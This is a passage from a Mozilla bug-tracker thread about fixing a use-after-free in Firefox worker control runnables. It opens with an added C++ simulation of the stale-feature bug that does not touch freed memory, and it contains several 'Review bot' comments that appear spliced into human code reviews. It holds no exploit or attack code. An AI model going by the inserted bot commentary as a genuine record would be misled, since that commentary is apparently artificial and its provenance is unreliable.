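To make the failure mode described in the review above concrete, here is an added, self-contained C++ model of the pattern; it is not Gecko code, and every name in it (Worker, Feature, ControlRunnable, LiveFeatures, SimulateClose) is hypothetical. It models a refcounted control runnable that also registers itself as a non-refcounted feature of its worker, exactly the "runnable+feature combo" under discussion. With the buggy Cancel(), the runnable is dropped without running, so its entry in the worker's feature list dangles by the time the feature list is walked (the read ASan flags in NotifyFeatures); with Cancel() forwarding to Run(), the control runnable always runs and removes itself first. The model tracks object liveness in a registry rather than dereferencing freed memory, so it reports stale entries instead of crashing.

```cpp
#include <algorithm>
#include <cstdio>
#include <memory>
#include <set>
#include <vector>

// Hypothetical model of the Gecko pattern discussed in this bug; names are
// constructed for the example and are not the real WorkerPrivate/Console code.

// A non-refcounted feature: the worker keeps a raw pointer to it and calls
// Notify() on status changes (the model's stand-in for NotifyFeatures).
struct Feature {
  virtual ~Feature() = default;
  virtual void Notify(int status) = 0;
};

// Registry of live Feature objects, so the model can detect a stale pointer in
// the feature list instead of dereferencing freed memory (ASan's job in the
// real browser).
static std::set<const Feature*>& LiveFeatures() {
  static std::set<const Feature*> live;
  return live;
}

struct Worker {
  std::vector<Feature*> features;  // non-owning, like WorkerPrivate's feature list

  void AddFeature(Feature* f) { features.push_back(f); }
  void RemoveFeature(Feature* f) {
    features.erase(std::remove(features.begin(), features.end(), f), features.end());
  }
  // Walks the feature list; returns how many entries point at freed objects
  // (each of those would be a heap-use-after-free read in the real code).
  int NotifyFeatures(int status) {
    int stale = 0;
    for (Feature* f : features) {
      if (LiveFeatures().count(f)) f->Notify(status); else ++stale;
    }
    return stale;
  }
};

// A refcounted control runnable that is also a Feature of its worker, like
// ConsoleRunnable in the report. The feature is removed only when Run() executes.
struct ControlRunnable : Feature {
  Worker& worker;
  bool ran = false;
  explicit ControlRunnable(Worker& w) : worker(w) {
    LiveFeatures().insert(this);
    worker.AddFeature(this);
  }
  ~ControlRunnable() override { LiveFeatures().erase(this); }
  void Notify(int) override {}
  void Run() { ran = true; worker.RemoveFeature(this); }
  // Buggy behaviour: cancel skips Run(), so the feature stays registered while
  // the last reference to the runnable goes away.
  virtual void Cancel() {}
};

// Fixed behaviour: a control runnable must always run, even when cancelled.
struct FixedControlRunnable : ControlRunnable {
  using ControlRunnable::ControlRunnable;
  void Cancel() override { Run(); }
};

// Models close(): pending control runnables are cancelled and the queue is
// cleared (refcount hits zero, object freed), then the worker notifies its
// features. Returns the number of stale feature-list entries observed.
template <class R> int SimulateClose() {
  Worker w;
  std::vector<std::shared_ptr<ControlRunnable>> queue;
  queue.push_back(std::make_shared<R>(w));
  for (auto& r : queue) r->Cancel();
  queue.clear();
  return w.NotifyFeatures(1);
}

int BuggyStaleCount() { return SimulateClose<ControlRunnable>(); }       // returns 1
int FixedStaleCount() { return SimulateClose<FixedControlRunnable>(); }  // returns 0

int main() {
  std::printf("buggy Cancel(): %d stale feature(s)\n", BuggyStaleCount());
  std::printf("fixed Cancel(): %d stale feature(s)\n", FixedStaleCount());
  return 0;
}
```

The liveness registry is the only part that has no counterpart in the real code: it stands in for the allocator instrumentation that produced the ASan report above, and lets the model return a count a test can check instead of reading freed memory.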
Flags: sec-bounty?
Attached patch crash2.patch (obsolete) — Splinter Review
Attachment #8593895 - Attachment is obsolete: true
Attachment #8594072 - Flags: review?(bent.mozilla)
Comment on attachment 8594072 [details] [diff] [review]
crash2.patch

Review of attachment 8594072 [details] [diff] [review]:
-----------------------------------------------------------------

r=me with this change:

::: dom/base/Console.cpp
@@ +356,5 @@
>          return true;
>        }
>  
> +      virtual nsresult
> +      Cancel() override
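Review bot: overriding Cancel() on ConsoleRunnable alone closes the stale-feature window for this one runnable only; the diagnosis earlier in the thread is that WorkerControlRunnable as a class lacks a Cancel hook that makes it always Run(), so any other control runnable that registers a feature keeps the same bug. Put the override on WorkerControlRunnable and have it forward to Run(). Also, this hunk declares it as `virtual nsresult Cancel() override` while the later WorkerRunnable.h hunk uses `NS_IMETHOD Cancel() override`; pick one form for the method.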

I'd prefer we move this to WorkerControlRunnable, all of them should behave this way.
Attachment #8594072 - Flags: review?(bent.mozilla) → review+
bent, it doesn't work that way. What if we do:

virtual nsresult Cancel() override { return NS_OK; }

and then we override this method in the console.

Feedback?
Flags: needinfo?(bent.mozilla)
Attached patch crash2.patch (obsolete) — Splinter Review
I guess we have to go back to the previous version of the patch.
Attachment #8594072 - Attachment is obsolete: true
Attachment #8594680 - Flags: review?(bent.mozilla)
Comment on attachment 8594680 [details] [diff] [review]
crash2.patch

Review of attachment 8594680 [details] [diff] [review]:
-----------------------------------------------------------------

No, comment 9 is the way we want to go here. It just exposed a different bug.
Attachment #8594680 - Flags: review?(bent.mozilla) → review-
I think we should try to figure out which WorkerControlRunnable is being scheduled after the worker has destroyed its JSContext. That's bad, and we should try to fix that.

And if we can't do that then we can make WorkerRunnable::Run a little more resilient so that it doesn't crash when being called after there's no JS context.
Flags: needinfo?(bent.mozilla)
Attached patch crash2.patch — Splinter Review
I'm having a hard time reproducing this issue. At least locally I cannot see the crash. But here is a patch where we check if JSContext is null:

https://treeherder.mozilla.org/#/jobs?repo=try&revision=3e1ff2213ab5
Attachment #8594680 - Attachment is obsolete: true
Attachment #8595356 - Flags: review?(bent.mozilla)
Comment on attachment 8595356 [details] [diff] [review]
crash2.patch

Review of attachment 8595356 [details] [diff] [review]:
-----------------------------------------------------------------

This looks ok... But I hate that we can't find that other late runnable...

::: dom/workers/WorkerRunnable.h
@@ +320,5 @@
>    virtual ~WorkerControlRunnable()
>    { }
>  
> +  NS_IMETHOD
> +  Cancel() override
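Review bot: a Cancel() override on WorkerControlRunnable carries the invariant that a cancelled control runnable still performs its WorkerRun cleanup (for ConsoleRunnable, removing itself from the feature list before its refcount drops); the hunk shows only the declaration, so when the body moves to the .cpp file it should route through Run() and tolerate the null JSContext case that the attached patch checks for, and a one-line comment in the header stating that control runnables are never skipped on cancel would document the requirement for future subclasses.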

Nit: Move the impl to the cpp file.
Attachment #8595356 - Flags: review?(bent.mozilla) → review+
This only affects 40, right?
(In reply to Andrew McCreight [:mccr8] from comment #18)
> This only affects 40, right?

Yep
Duplicate of this bug: 1157284
https://hg.mozilla.org/mozilla-central/rev/91e9b0c36889
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla40
Flags: sec-bounty? → sec-bounty+
Group: core-security
Assuming that Firefox 37 and earlier weren't affected, hence setting status-b2g-* to unaffected. Please correct if I'm wrong.
I think we should land a different version of this patch in v2.2. I'll keep the NI in order not to forget, and tomorrow I'll propose a patch.
Attached patch patch v2.2 — Splinter Review
Flags: needinfo?(amarchesini)
Attachment #8620913 - Flags: review?(bent.mozilla)
Attachment #8620913 - Flags: review?(bent.mozilla) → review+
Comment on attachment 8620913 [details] [diff] [review]
patch v2.2

[Approval Request Comment]
Bug caused by (feature/regressing bug #): Workers
User impact if declined: possibly a crash
Testing completed: no
Risk to taking this patch (and alternatives if risky): none
String or UUID changes made by this patch: none
Attachment #8620913 - Flags: approval-mozilla-b2g37?
(In reply to Andrea Marchesini (:baku) from comment #25)
> Comment on attachment 8620913 [details] [diff] [review]
> patch v2.2
> 
> [Approval Request Comment]
> Bug caused by (feature/regressing bug #): Workers
> User impact if declined: possibly a crash
> Testing completed: no
> Risk to taking this patch (and alternatives if risky): none
> String or UUID changes made by this patch: none

Hi Andrea,
Per comment 19 and 22, b2g37 (2.2) and before are unaffected. Why do we still need a patch for 2.2?
Flags: needinfo?(amarchesini)
It's not about the crash itself, but about some worker-shutdown procedure that could be wrongly executed.
As for this particular bug, yes, this cannot be executed in v2.2, but if the worker goes away, it can happen that some control runnable is not correctly executed.
Flags: needinfo?(amarchesini)
Comment on attachment 8620913 [details] [diff] [review]
patch v2.2

Thanks Baku,
Approving this as it increases stability for 2.2.
Attachment #8620913 - Flags: approval-mozilla-b2g37? → approval-mozilla-b2g37+